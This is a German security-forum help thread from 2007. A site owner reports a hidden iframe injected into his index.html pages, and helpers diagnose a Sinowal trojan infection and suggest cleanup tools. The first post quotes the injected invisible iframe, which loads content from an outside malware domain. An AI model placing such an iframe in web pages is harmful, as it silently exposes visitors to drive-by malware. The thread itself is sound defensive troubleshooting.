Zurück   Trojaner-Board > Malware entfernen > Plagegeister aller Art und deren Bekämpfung

Plagegeister aller Art und deren Bekämpfung: iframe Virus schreibt sich in index.html Seiten

Windows 7 Wenn Du nicht sicher bist, ob Du dir Malware oder Trojaner eingefangen hast, erstelle hier ein Thema. Ein Experte wird sich mit weiteren Anweisungen melden und Dir helfen die Malware zu entfernen oder Unerwünschte Software zu deinstallieren bzw. zu löschen. Bitte schildere dein Problem so genau wie möglich. Sollte es ein Trojaner oder Viren Problem sein wird ein Experte Dir bei der Beseitigug der Infektion helfen.

Antwort
Alt 05.05.2007, 08:44   #1
mechagodzilla
 
iframe Virus schreibt sich in index.html Seiten - Standard

iframe Virus schreibt sich in index.html Seiten



Hallo, ich habe bemerkt, dass sich bei Anklicken einiger von mir erstellten Internetseiten folgender Code hinter den Body-Tag geschrieben hat und sich dieser bei Aufruf der Seiten im Internet aktivieren will:

<iframe src='http://quickcnt.com/ld/axhst/' width='1' height='1' style='visibility: hidden;'></iframe>

Mein Kaspersky im Büro meldet mir ebenso einen Trojaner, wie mein ZoneAlarm zuhause.

Gebaut habe ich die Seiten am Büro-PC, dieser ist laut Kaspersky 6 aber nicht infiziert.

Wenn ich den schädlichen Code aus der Seite lösche ist alles wieder gut.
Der Code schreibt sich nur in die Startseite, und nicht in andere, die ich verändert habe.

Woran kann das liegen, und was kann ich dagegen tun?

Vielen Dank, Marcus

Alt 05.05.2007, 09:10   #2
Apocalypt
 
iframe Virus schreibt sich in index.html Seiten - Standard

iframe Virus schreibt sich in index.html Seiten



Zitat:
Zitat von mechagodzilla Beitrag anzeigen

Mein Kaspersky im Büro meldet mir ebenso einen Trojaner, wie mein ZoneAlarm zuhause.
Was genau melden die wo?!
__________________


Alt 05.05.2007, 09:37   #3
mechagodzilla
 
iframe Virus schreibt sich in index.html Seiten - Standard

iframe Virus schreibt sich in index.html Seiten



Meine ZoneAlarm Meldung:
__________________

Geändert von mechagodzilla (05.05.2007 um 09:44 Uhr)

Alt 05.05.2007, 09:50   #4
Apocalypt
 
iframe Virus schreibt sich in index.html Seiten - Standard

iframe Virus schreibt sich in index.html Seiten



Jetzt wären noch die genauen Dateipfade und Namen intressant denn die kann man deiner Grafik nicht entnehmen

Dan noch ein
http://www.trojaner-board.de/17493-a...ijackthis.html

Alt 05.05.2007, 10:00   #5
mechagodzilla
 
iframe Virus schreibt sich in index.html Seiten - Standard

iframe Virus schreibt sich in index.html Seiten



sorry, hier das Bild auch ganz


Hijack hat nichts gefährliches gefunden


Alt 05.05.2007, 10:02   #6
Apocalypt
 
iframe Virus schreibt sich in index.html Seiten - Standard

iframe Virus schreibt sich in index.html Seiten



Das ist merkwürdig, vielleicht ein Fehlalarm, lad die Dateien mal bei Virustotal hoch.

Alt 05.05.2007, 10:08   #7
Apocalypt
 
iframe Virus schreibt sich in index.html Seiten - Standard

iframe Virus schreibt sich in index.html Seiten



Hab ich noch vergessen: Poste das Logfile von HJT

Alt 05.05.2007, 10:12   #8
mechagodzilla
 
iframe Virus schreibt sich in index.html Seiten - Standard

iframe Virus schreibt sich in index.html Seiten



auch negativ, findet nichts. Aber wie kann sich Code in eine HTML-Seite einschreiben und speichern, sodass jeder User die Virenmeldung bekommt?

Alt 05.05.2007, 10:16   #9
mechagodzilla
 
iframe Virus schreibt sich in index.html Seiten - Standard

iframe Virus schreibt sich in index.html Seiten



hier das Logfile (habe ich auch schon auf der hijack Seite gecheckt)
Angehängte Dateien
Dateityp: txt hijackthis.txt (11,3 KB, 614x aufgerufen)

Alt 05.05.2007, 10:17   #10
Rene-gad
 
iframe Virus schreibt sich in index.html Seiten - Standard

iframe Virus schreibt sich in index.html Seiten



Zitat:
Zitat von mechagodzilla Beitrag anzeigen
Vielen Dank, Marcus
...Ahm, sorry, aber wer ist denn Britta? Nämlich sie soll sich einloggen und den Ordner Temporary Internet Files in ihrem Profil leeren: Löschen des Inhalt des Ordners "Temporary Internet Files"

Alt 05.05.2007, 10:22   #11
raman
 
iframe Virus schreibt sich in index.html Seiten - Standard

iframe Virus schreibt sich in index.html Seiten



Durch den Downloader wird dir eine Sinowal Variante untergeschoben. Combofix kann diese sehr gut loeschen.
F:\gioPool\ibm00004.dll.vir
[FUND] Ist das Trojanische Pferd TR/PSW.Sinowal.CP.5
[WARNUNG] Die Datei wurde ignoriert.
F:\gioPool\ibm00003.dll.vir
[FUND] Ist das Trojanische Pferd TR/PSW.Sinowal.CP.7
[WARNUNG] Die Datei wurde ignoriert.
F:\gioPool\a.exe.vir
[FUND] Ist das Trojanische Pferd TR/Obfuscated.FV.6
[WARNUNG] Die Datei wurde ignoriert.
__________________
MfG Ralf

Alt 05.05.2007, 10:31   #12
mechagodzilla
 
iframe Virus schreibt sich in index.html Seiten - Standard

iframe Virus schreibt sich in index.html Seiten



Britta ist meine Frau, meinst du, sie ist der Virus?

Temporary Internet Files habe ich gelöscht. Ist mir trotzdem ein Rätsel, wie diese HTML-Code Änderungen passieren konnte....

Alt 05.05.2007, 10:47   #13
Rene-gad
 
iframe Virus schreibt sich in index.html Seiten - Standard

iframe Virus schreibt sich in index.html Seiten



Zitat:
Zitat von mechagodzilla Beitrag anzeigen
meinst du, sie ist der Virus?
Das kann ich aus der Ferne schlecht beurteilen . Was ich im Bild sehe - das Problem wurde aus ihrem IE-Profil gemeldet.
Zitat:
Temporary Internet Files habe ich gelöscht.
Im Profil deiner Frau - auch?
Zitat:
Ist mir trotzdem ein Rätsel, wie diese HTML-Code Änderungen passieren konnte....
Alles hängt vom Verhalten des Benutzers und den Einstellungen der Programme, die im Internet gehen dürfen.

Antwort

Themen zu iframe Virus schreibt sich in index.html Seiten
aktiviere, aktivieren, andere, aufruf, code, einiger, erstell, folge, folgender, interne, internetseite, internetseiten, kaspersky, klicke, klicken, melde, meldet, seite, seiten, startseite, style, trojaner, verändert, virus, zonealarm



Ähnliche Themen: iframe Virus schreibt sich in index.html Seiten


  1. chrome://quick_start/content/index.html in Firefox-Tab
    Log-Analyse und Auswertung - 02.10.2014 (6)
  2. chrome://quick_start/content/index.html
    Plagegeister aller Art und deren Bekämpfung - 04.09.2014 (2)
  3. chrome://quick_start/content/index.html entfernen?
    Plagegeister aller Art und deren Bekämpfung - 30.08.2014 (17)
  4. chrome://quick_start/content/index.html in Firefox-Tab
    Log-Analyse und Auswertung - 18.07.2014 (15)
  5. Trojaner chrome://quick_start/content/index.html -
    Log-Analyse und Auswertung - 03.06.2014 (1)
  6. chrome://quick_start/content/index.html entfernen?
    Plagegeister aller Art und deren Bekämpfung - 19.05.2014 (9)
  7. Adware Win32/ OpenCandy und HTML/Iframe.B.Gen virus gefunden!
    Plagegeister aller Art und deren Bekämpfung - 27.12.2012 (22)
  8. 'HTML/IFrame.aho' [virus] in Datei C:\Users\Nana\AppData\Local\Mozilla\Firefox\Profiles\twl50o4s.de
    Plagegeister aller Art und deren Bekämpfung - 03.08.2012 (9)
  9. html/iframe.b.gen virus BKA trojaner
    Plagegeister aller Art und deren Bekämpfung - 15.06.2012 (13)
  10. Unbekannter Virus verseucht alle index.html/php Dateien auf dem Server!
    Plagegeister aller Art und deren Bekämpfung - 19.12.2010 (4)
  11. HTML/IFrame.ktf' [virus]
    Mülltonne - 14.07.2008 (0)
  12. Antivir Update funktioniert nicht (HTML/IFrame.Age.tih & HEUR/Exploit.HTML gefunden)
    Plagegeister aller Art und deren Bekämpfung - 05.12.2007 (1)
  13. iframe Virus schreibt sich in index.html Seiten
    Plagegeister aller Art und deren Bekämpfung - 09.08.2007 (2)
  14. Trojaner ? res://msaps.dll/index.html
    Log-Analyse und Auswertung - 13.01.2005 (11)
  15. res://rewmu.dll/index.html#37794
    Plagegeister aller Art und deren Bekämpfung - 27.07.2004 (5)
  16. Hilfe: res://lyzcp.dll/index.html#37049
    Log-Analyse und Auswertung - 15.07.2004 (1)
  17. res://mshp.dll/index.html
    Plagegeister aller Art und deren Bekämpfung - 28.05.2004 (1)

Zum Thema iframe Virus schreibt sich in index.html Seiten - Hallo, ich habe bemerkt, dass sich bei Anklicken einiger von mir erstellten Internetseiten folgender Code hinter den Body-Tag geschrieben hat und sich dieser bei Aufruf der Seiten im Internet aktivieren - iframe Virus schreibt sich in index.html Seiten...
Archiv
Du betrachtest: iframe Virus schreibt sich in index.html Seiten auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.